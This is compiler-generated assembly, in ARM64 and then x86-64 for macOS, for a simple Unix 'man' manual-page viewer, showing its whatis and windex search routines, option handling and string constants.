[x9] b LBB11_34 LBB11_33: ; in Loop: Header=BB11_14 Depth=3 ldr x9, [sp, #32] ; 8-byte Folded Reload ldr x8, [sp, #48] str x8, [x9] adrp x8, l_.str.40@PAGE add x8, x8, l_.str.40@PAGEOFF str x8, [sp, #48] b LBB11_34 LBB11_34: ; in Loop: Header=BB11_14 Depth=3 b LBB11_36 LBB11_35: ; in Loop: Header=BB11_14 Depth=3 bl _usage b LBB11_36 LBB11_36: ; in Loop: Header=BB11_14 Depth=3 b LBB11_14 LBB11_37: ; in Loop: Header=BB11_6 Depth=2 b LBB11_6 LBB11_38: ; in Loop: Header=BB11_5 Depth=1 ldur w8, [x29, #-36] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB11_40 b LBB11_39 LBB11_39: ; in Loop: Header=BB11_5 Depth=1 bl _usage b LBB11_40 LBB11_40: ; in Loop: Header=BB11_5 Depth=1 ldur x8, [x29, #-16] ldursw x9, [x29, #-36] ldr x8, [x8, x9, lsl #3] ldrsb w8, [x8] subs w8, w8, #48 subs w8, w8, #9 cset w8, hi tbnz w8, #0, LBB11_43 b LBB11_41 LBB11_41: ; in Loop: Header=BB11_5 Depth=1 ldur x8, [x29, #-16] ldursw x9, [x29, #-36] ldr x8, [x8, x9, lsl #3] ldrsb w8, [x8, #1] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB11_43 b LBB11_42 LBB11_42: ; in Loop: Header=BB11_5 Depth=1 ldur x8, [x29, #-16] ldursw x9, [x29, #-36] mov x10, x9 add w10, w10, #1 stur w10, [x29, #-36] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-32] b LBB11_43 LBB11_43: ; in Loop: Header=BB11_5 Depth=1 ldur w8, [x29, #-36] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB11_45 b LBB11_44 LBB11_44: ; in Loop: Header=BB11_5 Depth=1 bl _usage b LBB11_45 LBB11_45: ; in Loop: Header=BB11_5 Depth=1 ldur x8, [x29, #-16] ldursw x9, [x29, #-36] mov x10, x9 add w10, w10, #1 stur w10, [x29, #-36] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] adrp x8, _whatis@PAGE ldr w8, [x8, _whatis@PAGEOFF] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB11_47 b LBB11_46 LBB11_46: ; in Loop: Header=BB11_5 Depth=1 adrp x8, _apropos@PAGE ldr w8, [x8, _apropos@PAGEOFF] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB11_48 b LBB11_47 LBB11_47: ; in Loop: Header=BB11_5 Depth=1 ldur x0, [x29, #-24] bl _keyword b LBB11_55 LBB11_48: ; in Loop: Header=BB11_5 Depth=1 ldr x8, [sp, #40] ; 8-byte Folded Reload str wzr, [x8] ldur x0, [x29, #-24] ldur x1, [x29, #-32] bl _searchmanpath ldr x8, [sp, #40] ; 8-byte Folded Reload ldr w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB11_50 b LBB11_49 LBB11_49: ; in Loop: Header=BB11_5 Depth=1 ldur x0, [x29, #-24] mov w1, #2 adrp x2, l_.str.32@PAGE add x2, x2, l_.str.32@PAGEOFF bl _showpage b LBB11_50 LBB11_50: ; in Loop: Header=BB11_5 Depth=1 ldr x8, [sp, #40] ; 8-byte Folded Reload ldr w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB11_54 b LBB11_51 LBB11_51: adrp x8, _quiet@PAGE ldr w8, [x8, _quiet@PAGEOFF] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB11_53 b LBB11_52 LBB11_52: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] ldur x8, [x29, #-24] mov x9, sp str x8, [x9] adrp x1, l_.str.41@PAGE add x1, x1, l_.str.41@PAGEOFF bl _fprintf b LBB11_53 LBB11_53: mov w0, #1 bl _exit LBB11_54: ; in Loop: Header=BB11_5 Depth=1 b LBB11_55 LBB11_55: ; in Loop: Header=BB11_5 Depth=1 b LBB11_56 LBB11_56: ; in Loop: Header=BB11_5 Depth=1 ldur w8, [x29, #-36] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB11_5 b LBB11_57 LBB11_57: mov w0, #0 ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc .p2align 2 lJTI11_0: .long LBB11_29-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_17-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_18-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_19-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_21-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_20-Ltmp1 .long LBB11_35-Ltmp1 .long LBB11_23-Ltmp1 .long LBB11_22-Ltmp1 ; -- End function .section __DATA,__data .globl _MANPATH ; @MANPATH _MANPATH: .asciz "/usr/local/man:/usr/man:/usr/gnu/man" .globl _PAGER ; @PAGER _PAGER: .asciz "more" .globl _TBL_MAGIC ; @TBL_MAGIC _TBL_MAGIC: .asciz ".\\\"t\n" .zerofill __DATA,__bss,_searchwhatis.page,256,0 ; @searchwhatis.page .zerofill __DATA,__bss,_searchwhatis.section,32,0 ; @searchwhatis.section .zerofill __DATA,__bss,_searchwindex.page,256,0 ; @searchwindex.page .zerofill __DATA,__bss,_searchwindex.section,32,0 ; @searchwindex.section .zerofill __DATA,__bss,_searchwindex.low,8,3 ; @searchwindex.low .zerofill __DATA,__bss,_searchwindex.high,8,3 ; @searchwindex.high .globl _ALL ; @ALL .zerofill __DATA,__common,_ALL,1,0 .globl _all ; @all .zerofill __DATA,__common,_all,4,2 .globl _whatis ; @whatis .zerofill __DATA,__common,_whatis,4,2 .globl _apropos ; @apropos .zerofill __DATA,__common,_apropos,4,2 .globl _quiet ; @quiet .zerofill __DATA,__common,_quiet,4,2 .globl _rofftype ; @rofftype .zerofill __DATA,__common,_rofftype,4,2 .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "nroff" l_.str.1: ; @.str.1 .asciz "troff" .section __DATA,__data .globl _roff ; @roff .p2align 3 _roff: .quad l_.str .quad l_.str.1 .comm _pipeline,512,3 ; @pipeline .globl _plast ; @plast .p2align 3 _plast: .quad _pipeline .comm _tty,4,2 ; @tty .comm _pager,8,3 ; @pager .section __TEXT,__cstring,cstring_literals l_.str.2: ; @.str.2 .asciz "cat" l_.str.3: ; @.str.3 .asciz "man: can't create a pipe: %s\n" l_.str.4: ; @.str.4 .asciz "man: cannot fork: %s\n" .comm _manpath,8,3 ; @manpath l_.str.5: ; @.str.5 .asciz "MANPATH=" l_.str.6: ; @.str.6 .asciz "man: %s: %s\n" l_.str.7: ; @.str.7 .asciz "man: wait(): %s\n" l_.str.8: ; @.str.8 .asciz "apropos" l_.str.9: ; @.str.9 .asciz "whatis" l_.str.10: ; @.str.10 .asciz "-a" l_.str.11: ; @.str.11 .asciz "Looking for keyword '%s'\n" .comm _shown,4,2 ; @shown l_.str.12: ; @.str.12 .asciz "zcat" l_.str.13: ; @.str.13 .asciz "/usr/lib/sgml/sgml2roff" l_.str.14: ; @.str.14 .asciz "tbl" l_.str.15: ; @.str.15 .asciz "eqn" l_.str.16: ; @.str.16 .asciz "r" l_.str.17: ; @.str.17 .asciz "%s %s\n" l_.str.18: ; @.str.18 .asciz "Showing" l_.str.19: ; @.str.19 .asciz "Formatting" .section __DATA,__data .p2align 3 ; @trymandir.searchN _trymandir.searchN: .long 0 ; 0x0 .space 4 .quad l_.str.20 .long 1 ; 0x1 .space 4 .quad l_.str.21 .long 2 ; 0x2 .space 4 .quad l_.str.22 .long 3 ; 0x3 .space 4 .quad l_.str.23 .long 4 ; 0x4 .space 4 .quad l_.str.24 .long 5 ; 0x5 .space 4 .quad l_.str.25 .long 0 ; 0x0 .space 4 .quad l_.str.26 .long 1 ; 0x1 .space 4 .quad l_.str.27 .long 2 ; 0x2 .space 4 .quad l_.str.28 .long 3 ; 0x3 .space 4 .quad l_.str.29 .section __TEXT,__cstring,cstring_literals l_.str.20: ; @.str.20 .asciz "%s/cat%s/%s.%s" l_.str.21: ; @.str.21 .asciz "%s/cat%s/%s.%s.Z" l_.str.22: ; @.str.22 .asciz "%s/man%s/%s.%s" l_.str.23: ; @.str.23 .asciz "%s/man%s/%s.%s.Z" l_.str.24: ; @.str.24 .asciz "%s/sman%s/%s.%s" l_.str.25: ; @.str.25 .asciz "%s/sman%s/%s.%s.Z" l_.str.26: ; @.str.26 .asciz "%s/cat%.1s/%s.%s" l_.str.27: ; @.str.27 .asciz "%s/cat%.1s/%s.%s.Z" l_.str.28: ; @.str.28 .asciz "%s/man%.1s/%s.%s" l_.str.29: ; @.str.29 .asciz "%s/man%.1s/%s.%s.Z" l_.str.30: ; @.str.30 .asciz "%s/windex" l_.str.31: ; @.str.31 .asciz "%s/whatis" l_.str.32: ; @.str.32 .asciz "-man" l_.str.33: ; @.str.33 .asciz "." l_.str.34: ; @.str.34 .asciz ".." l_.str.35: ; @.str.35 .asciz "man" l_.str.36: ; @.str.36 .asciz "%s/%s" l_.str.37: ; @.str.37 .asciz "Usage: man -[antfkq] [-M path] [-s section] title ...\n" l_.str.38: ; @.str.38 .asciz "PAGER" l_.str.39: ; @.str.39 .asciz "MANPATH" l_.str.40: ; @.str.40 .space 1 l_.str.41: ; @.str.41 .asciz "man: no manual on %s\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _searchwhatis ## -- Begin function searchwhatis .p2align 4, 0x90 _searchwhatis: ## @searchwhatis .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $352, %rsp ## imm = 0x160 movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -280(%rbp) movq %rsi, -288(%rbp) movq %rdx, -296(%rbp) movq %rcx, -304(%rbp) movl $0, -308(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_2 Depth 2 ## Child Loop BB0_3 Depth 3 ## Child Loop BB0_9 Depth 3 ## Child Loop BB0_31 Depth 2 ## Child Loop BB0_46 Depth 2 movl $1, -316(%rbp) leaq _searchwhatis.section(%rip), %rax movq %rax, -328(%rbp) movq -280(%rbp), %rdi callq _fgetc movl %eax, -312(%rbp) LBB0_2: ## Parent Loop BB0_1 Depth=1 ## => This Loop Header: Depth=2 ## Child Loop BB0_3 Depth 3 ## Child Loop BB0_9 Depth 3 leaq -272(%rbp), %rax movq %rax, -336(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## Parent Loop BB0_2 Depth=2 ## => This Inner Loop Header: Depth=3 movb $1, %al cmpl $32, -312(%rbp) movb %al, -337(%rbp) ## 1-byte Spill je LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=3 movb $1, %al cmpl $9, -312(%rbp) movb %al, -337(%rbp) ## 1-byte Spill je LBB0_6 ## %bb.5: ## in Loop: Header=BB0_3 Depth=3 cmpl $44, -312(%rbp) sete %al movb %al, -337(%rbp) ## 1-byte Spill LBB0_6: ## in Loop: Header=BB0_3 Depth=3 movb -337(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_7 jmp LBB0_8 LBB0_7: ## in Loop: Header=BB0_3 Depth=3 movq -280(%rbp), %rdi callq _fgetc movl %eax, -312(%rbp) jmp LBB0_3 LBB0_8: ## in Loop: Header=BB0_2 Depth=2 jmp LBB0_9 LBB0_9: ## Parent Loop BB0_1 Depth=1 ## Parent Loop BB0_2 Depth=2 ## => This Inner Loop Header: Depth=3 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $32, -312(%rbp) movb %al, -338(%rbp) ## 1-byte Spill je LBB0_15 ## %bb.10: ## in Loop: Header=BB0_9 Depth=3 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $9, -312(%rbp) movb %al, -338(%rbp) ## 1-byte Spill je LBB0_15 ## %bb.11: ## in Loop: Header=BB0_9 Depth=3 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $44, -312(%rbp) movb %al, -338(%rbp) ## 1-byte Spill je LBB0_15 ## %bb.12: ## in Loop: Header=BB0_9 Depth=3 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $40, -312(%rbp) movb %al, -338(%rbp) ## 1-byte Spill je LBB0_15 ## %bb.13: ## in Loop: Header=BB0_9 Depth=3 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $10, -312(%rbp) movb %al, -338(%rbp) ## 1-byte Spill je LBB0_15 ## %bb.14: ## in Loop: Header=BB0_9 Depth=3 cmpl $-1, -312(%rbp) setne %al movb %al, -338(%rbp) ## 1-byte Spill LBB0_15: ## in Loop: Header=BB0_9 Depth=3 movb -338(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_16 jmp LBB0_19 LBB0_16: ## in Loop: Header=BB0_9 Depth=3 movq -336(%rbp), %rax leaq -272(%rbp), %rcx addq $256, %rcx ## imm = 0x100 addq $-1, %rcx cmpq %rcx, %rax jae LBB0_18 ## %bb.17: ## in Loop: Header=BB0_9 Depth=3 movl -312(%rbp), %eax movb %al, %cl movq -336(%rbp), %rax movq %rax, %rdx addq $1, %rdx movq %rdx, -336(%rbp) movb %cl, (%rax) LBB0_18: ## in Loop: Header=BB0_9 Depth=3 movq -280(%rbp), %rdi callq _getc movl %eax, -312(%rbp) jmp LBB0_9 LBB0_19: ## in Loop: Header=BB0_2 Depth=2 movq -336(%rbp), %rax movb $0, (%rax) cmpl $0, -316(%rbp) je LBB0_21 ## %bb.20: ## in Loop: Header=BB0_2 Depth=2 leaq -272(%rbp), %rsi leaq _searchwhatis.page(%rip), %rdi movl $256, %edx ## imm = 0x100 callq ___strcpy_chk movl $0, -316(%rbp) LBB0_21: ## in Loop: Header=BB0_2 Depth=2 leaq -272(%rbp), %rdi movq -288(%rbp), %rsi callq _strcmp cmpl $0, %eax jne LBB0_23 ## %bb.22: ## in Loop: Header=BB0_2 Depth=2 movl $1, -308(%rbp) LBB0_23: ## in Loop: Header=BB0_2 Depth=2 jmp LBB0_24 LBB0_24: ## in Loop: Header=BB0_2 Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $40, -312(%rbp) movb %al, -339(%rbp) ## 1-byte Spill je LBB0_27 ## %bb.25: ## in Loop: Header=BB0_2 Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $10, -312(%rbp) movb %al, -339(%rbp) ## 1-byte Spill je LBB0_27 ## %bb.26: ## in Loop: Header=BB0_2 Depth=2 cmpl $-1, -312(%rbp) setne %al movb %al, -339(%rbp) ## 1-byte Spill LBB0_27: ## in Loop: Header=BB0_2 Depth=2 movb -339(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_2 ## %bb.28: ## in Loop: Header=BB0_1 Depth=1 cmpl $40, -312(%rbp) je LBB0_30 ## %bb.29: ## in Loop: Header=BB0_1 Depth=1 movl $0, -308(%rbp) jmp LBB0_45 LBB0_30: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_31 LBB0_31: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movq -280(%rbp), %rdi callq _fgetc movl %eax, %ecx movl %ecx, -312(%rbp) xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $41, %ecx movb %al, -340(%rbp) ## 1-byte Spill je LBB0_34 ## %bb.32: ## in Loop: Header=BB0_31 Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $10, -312(%rbp) movb %al, -340(%rbp) ## 1-byte Spill je LBB0_34 ## %bb.33: ## in Loop: Header=BB0_31 Depth=2 cmpl $-1, -312(%rbp) setne %al movb %al, -340(%rbp) ## 1-byte Spill LBB0_34: ## in Loop: Header=BB0_31 Depth=2 movb -340(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_35 jmp LBB0_41 LBB0_35: ## in Loop: Header=BB0_31 Depth=2 movl $65, %eax cmpl -312(%rbp), %eax jg LBB0_38 ## %bb.36: ## in Loop: Header=BB0_31 Depth=2 cmpl $90, -312(%rbp) jg LBB0_38 ## %bb.37: ## in Loop: Header=BB0_31 Depth=2 movl -312(%rbp), %eax subl $65, %eax addl $97, %eax movl %eax, -312(%rbp) LBB0_38: ## in Loop: Header=BB0_31 Depth=2 leaq _searchwhatis.section(%rip), %rax addq $31, %rax cmpq %rax, -328(%rbp) jae LBB0_40 ## %bb.39: ## in Loop: Header=BB0_31 Depth=2 movl -312(%rbp), %eax movb %al, %cl movq -328(%rbp), %rax movq %rax, %rdx addq $1, %rdx movq %rdx, -328(%rbp) movb %cl, (%rax) LBB0_40: ## in Loop: Header=BB0_31 Depth=2 jmp LBB0_31 LBB0_41: ## in Loop: Header=BB0_1 Depth=1 movq -328(%rbp), %rax movb $0, (%rax) cmpl $41, -312(%rbp) jne LBB0_43 ## %bb.42: ## in Loop: Header=BB0_1 Depth=1 leaq _searchwhatis.section(%rip), %rax cmpq %rax, -328(%rbp) jne LBB0_44 LBB0_43: ## in Loop: Header=BB0_1 Depth=1 movl $0, -308(%rbp) LBB0_44: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_45 LBB0_45: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_46 LBB0_46: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $-1, -312(%rbp) movb %al, -341(%rbp) ## 1-byte Spill je LBB0_48 ## %bb.47: ## in Loop: Header=BB0_46 Depth=2 cmpl $10, -312(%rbp) setne %al movb %al, -341(%rbp) ## 1-byte Spill LBB0_48: ## in Loop: Header=BB0_46 Depth=2 movb -341(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_49 jmp LBB0_50 LBB0_49: ## in Loop: Header=BB0_46 Depth=2 movq -280(%rbp), %rdi callq _getc movl %eax, -312(%rbp) jmp LBB0_46 LBB0_50: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_51 LBB0_51: ## in Loop: Header=BB0_1 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -308(%rbp) movb %al, -342(%rbp) ## 1-byte Spill jne LBB0_53 ## %bb.52: ## in Loop: Header=BB0_1 Depth=1 cmpl $-1, -312(%rbp) setne %al movb %al, -342(%rbp) ## 1-byte Spill LBB0_53: ## in Loop: Header=BB0_1 Depth=1 movb -342(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_1 ## %bb.54: cmpl $0, -308(%rbp) je LBB0_56 ## %bb.55: movq -296(%rbp), %rax leaq _searchwhatis.page(%rip), %rcx movq %rcx, (%rax) movq -304(%rbp), %rax leaq _searchwhatis.section(%rip), %rcx movq %rcx, (%rax) LBB0_56: cmpl $-1, -312(%rbp) jne LBB0_58 ## %bb.57: movl $4294967295, %eax ## imm = 0xFFFFFFFF movl %eax, -348(%rbp) ## 4-byte Spill jmp LBB0_59 LBB0_58: movl -308(%rbp), %eax movl %eax, -348(%rbp) ## 4-byte Spill LBB0_59: movl -348(%rbp), %eax ## 4-byte Reload movl %eax, -352(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_61 ## %bb.60: movl -352(%rbp), %eax ## 4-byte Reload addq $352, %rsp ## imm = 0x160 popq %rbp retq LBB0_61: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _searchwindex ## -- Begin function searchwindex .p2align 4, 0x90 _searchwindex: ## @searchwindex .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $96, %rsp movq %rdi, -16(%rbp) movq %rsi, -24(%rbp) movq %rdx, -32(%rbp) movq %rcx, -40(%rbp) movq -16(%rbp), %rdi callq _ftell cmpq $0, %rax jne LBB1_2 ## %bb.1: movq $0, _searchwindex.low(%rip) movq -16(%rbp), %rdi xorl %eax, %eax movl %eax, %esi movl $2, %edx callq _fseek movq -16(%rbp), %rdi callq _ftell movq %rax, _searchwindex.high(%rip) LBB1_2: jmp LBB1_3 LBB1_3: ## =>This Loop Header: Depth=1 ## Child Loop BB1_11 Depth 2 ## Child Loop BB1_19 Depth 2 movq _searchwindex.low(%rip), %rax cmpq _searchwindex.high(%rip), %rax jg LBB1_31 ## %bb.4: ## in Loop: Header=BB1_3 Depth=1 movq -24(%rbp), %rax movq %rax, -72(%rbp) movq _searchwindex.low(%rip), %rax addq _searchwindex.high(%rip), %rax sarq $1, %rax movq %rax, -56(%rbp) movq %rax, -48(%rbp) cmpq $0, -48(%rbp) jne LBB1_8 ## %bb.5: ## in Loop: Header=BB1_3 Depth=1 movq -16(%rbp), %rdi xorl %eax, %eax movl %eax, %esi xorl %edx, %edx callq _fseek cmpl $0, %eax je LBB1_7 ## %bb.6: movl $-1, -4(%rbp) jmp LBB1_103 LBB1_7: ## in Loop: Header=BB1_3 Depth=1 jmp LBB1_18 LBB1_8: ## in Loop: Header=BB1_3 Depth=1 movq -16(%rbp), %rdi movq -48(%rbp), %rsi subq $1, %rsi xorl %edx, %edx callq _fseek cmpl $0, %eax je LBB1_10 ## %bb.9: movl $-1, -4(%rbp) jmp LBB1_103 LBB1_10: ## in Loop: Header=BB1_3 Depth=1 jmp LBB1_11 LBB1_11: ## Parent Loop BB1_3 Depth=1 ## => This Inner Loop Header: Depth=2 movq -16(%rbp), %rdi callq _getc movl %eax, %ecx movl %ecx, -60(%rbp) xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $-1, %ecx movb %al, -81(%rbp) ## 1-byte Spill je LBB1_13 ## %bb.12: ## in Loop: Header=BB1_11 Depth=2 cmpl $10, -60(%rbp) setne %al movb %al, -81(%rbp) ## 1-byte Spill LBB1_13: ## in Loop: Header=BB1_11 Depth=2 movb -81(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_14 jmp LBB1_15 LBB1_14: ## in Loop: Header=BB1_11 Depth=2 movq -56(%rbp), %rax addq $1, %rax movq %rax, -56(%rbp) jmp LBB1_11 LBB1_15: ## in Loop: Header=BB1_3 Depth=1 movq -16(%rbp), %rdi callq _ferror cmpl $0, %eax je LBB1_17 ## %bb.16: movl $-1, -4(%rbp) jmp LBB1_103 LBB1_17: ## in Loop: Header=BB1_3 Depth=1 jmp LBB1_18 LBB1_18: ## in Loop: Header=BB1_3 Depth=1 jmp LBB1_19 LBB1_19: ## Parent Loop BB1_3 Depth=1 ## => This Inner Loop Header: Depth=2 movq -16(%rbp), %rdi callq _getc movl %eax, -60(%rbp) cmpl $32, %eax je LBB1_21 ## %bb.20: ## in Loop: Header=BB1_19 Depth=2 cmpl $9, -60(%rbp) jne LBB1_22 LBB1_21: ## in Loop: Header=BB1_19 Depth=2 movl $0, -60(%rbp) LBB1_22: ## in Loop: Header=BB1_19 Depth=2 cmpl $0, -60(%rbp) je LBB1_24 ## %bb.23: ## in Loop: Header=BB1_19 Depth=2 movl -60(%rbp), %eax movq -72(%rbp), %rcx movzbl (%rcx), %ecx cmpl %ecx, %eax je LBB1_25 LBB1_24: ## in Loop: Header=BB1_3 Depth=1 jmp LBB1_26 LBB1_25: ## in Loop: Header=BB1_19 Depth=2 movq -72(%rbp), %rax addq $1, %rax movq %rax, -72(%rbp) jmp LBB1_19 LBB1_26: ## in Loop: Header=BB1_3 Depth=1 cmpl $-1, -60(%rbp) je LBB1_28 ## %bb.27: ## in Loop: Header=BB1_3 Depth=1 movq -72(%rbp), %rax movzbl (%rax), %eax cmpl -60(%rbp), %eax jg LBB1_29 LBB1_28: ## in Loop: Header=BB1_3 Depth=1 movq -48(%rbp), %rax subq $1, %rax movq %rax, _searchwindex.high(%rip) jmp LBB1_30 LBB1_29: ## in Loop: Header=BB1_3 Depth=1 movq -56(%rbp), %rax addq $1, %rax movq %rax, _searchwindex.low(%rip) LBB1_30: ## in Loop: Header=BB1_3 Depth=1 jmp LBB1_3 LBB1_31: movq -16(%rbp), %rdi movq _searchwindex.low(%rip), %rsi xorl %edx, %edx callq _fseek cmpl $0, %eax je LBB1_33 ## %bb.32: movl $-1, -4(%rbp) jmp LBB1_103 LBB1_33: jmp LBB1_34 LBB1_34: ## =>This Loop Header: Depth=1 ## Child Loop BB1_36 Depth 2 ## Child Loop BB1_44 Depth 2 cmpq $0, _searchwindex.low(%rip) je LBB1_43 ## %bb.35: ## in Loop: Header=BB1_34 Depth=1 jmp LBB1_36 LBB1_36: ## Parent Loop BB1_34 Depth=1 ## => This Inner Loop Header: Depth=2 movq -16(%rbp), %rdi callq _getc movl %eax, %ecx movl %ecx, -60(%rbp) xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $-1, %ecx movb %al, -82(%rbp) ## 1-byte Spill je LBB1_38 ## %bb.37: ## in Loop: Header=BB1_36 Depth=2 cmpl $10, -60(%rbp) setne %al movb %al, -82(%rbp) ## 1-byte Spill LBB1_38: ## in Loop: Header=BB1_36 Depth=2 movb -82(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_39 jmp LBB1_40 LBB1_39: ## in Loop: Header=BB1_36 Depth=2 movq _searchwindex.low(%rip), %rax addq $1, %rax movq %rax, _searchwindex.low(%rip) jmp LBB1_36 LBB1_40: ## in Loop: Header=BB1_34 Depth=1 movq -16(%rbp), %rdi callq _ferror cmpl $0, %eax je LBB1_42 ## %bb.41: movl $-1, -4(%rbp) jmp LBB1_103 LBB1_42: ## in Loop: Header=BB1_34 Depth=1 jmp LBB1_43 LBB1_43: ## in Loop: Header=BB1_34 Depth=1 movq -24(%rbp), %rax movq %rax, -72(%rbp) LBB1_44: ## Parent Loop BB1_34 Depth=1 ## => This Inner Loop Header: Depth=2 movq -16(%rbp), %rdi callq _getc movl %eax, -60(%rbp) cmpl $-1, %eax jne LBB1_46 ## %bb.45: movl $0, -4(%rbp) jmp LBB1_103 LBB1_46: ## in Loop: Header=BB1_44 Depth=2 movq _searchwindex.low(%rip), %rax addq $1, %rax movq %rax, _searchwindex.low(%rip) cmpl $32, -60(%rbp) je LBB1_48 ## %bb.47: ## in Loop: Header=BB1_44 Depth=2 cmpl $9, -60(%rbp) jne LBB1_49 LBB1_48: ## in Loop: Header=BB1_44 Depth=2 movl $0, -60(%rbp) LBB1_49: ## in Loop: Header=BB1_44 Depth=2 cmpl $0, -60(%rbp) je LBB1_51 ## %bb.50: ## in Loop: Header=BB1_44 Depth=2 movl -60(%rbp), %eax movq -72(%rbp), %rcx movzbl (%rcx), %ecx cmpl %ecx, %eax je LBB1_52 LBB1_51: ## in Loop: Header=BB1_34 Depth=1 jmp LBB1_53 LBB1_52: ## in Loop: Header=BB1_44 Depth=2 movq -72(%rbp), %rax addq $1, %rax movq %rax, -72(%rbp) jmp LBB1_44 LBB1_53: ## in Loop: Header=BB1_34 Depth=1 jmp LBB1_54 LBB1_54: ## in Loop: Header=BB1_34 Depth=1 movl -60(%rbp), %eax movq -72(%rbp), %rcx movzbl (%rcx), %ecx cmpl %ecx, %eax jl LBB1_34 ## %bb.55: movq -72(%rbp), %rax movzbl (%rax), %eax cmpl -60(%rbp), %eax je LBB1_57 ## %bb.56: movl $0, -4(%rbp) jmp LBB1_103 LBB1_57: jmp LBB1_58 LBB1_58: ## =>This Inner Loop Header: Depth=1 movq -16(%rbp), %rdi callq _fgetc movl %eax, %ecx movl %ecx, -60(%rbp) movb $1, %al cmpl $32, %ecx movb %al, -83(%rbp) ## 1-byte Spill je LBB1_60 ## %bb.59: ## in Loop: Header=BB1_58 Depth=1 cmpl $9, -60(%rbp) sete %al movb %al, -83(%rbp) ## 1-byte Spill LBB1_60: ## in Loop: Header=BB1_58 Depth=1 movb -83(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB1_61 jmp LBB1_62 LBB1_61: ## in Loop: Header=BB1_58 Depth=1 jmp LBB1_58 LBB1_62: leaq _searchwindex.page(%rip), %rax movq %rax, -80(%rbp) LBB1_63: ## =>This Inner Loop Header: Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $32, -60(%rbp) movb %al, -84(%rbp) ## 1-byte Spill je LBB1_68 ## %bb.64: ## in Loop: Header=BB1_63 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $9, -60(%rbp) movb %al, -84(%rbp) ## 1-byte Spill je LBB1_68 ## %bb.65: ## in Loop: Header=BB1_63 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $40, -60(%rbp) movb %al, -84(%rbp) ## 1-byte Spill je LBB1_68 ## %bb.66: ## in Loop: 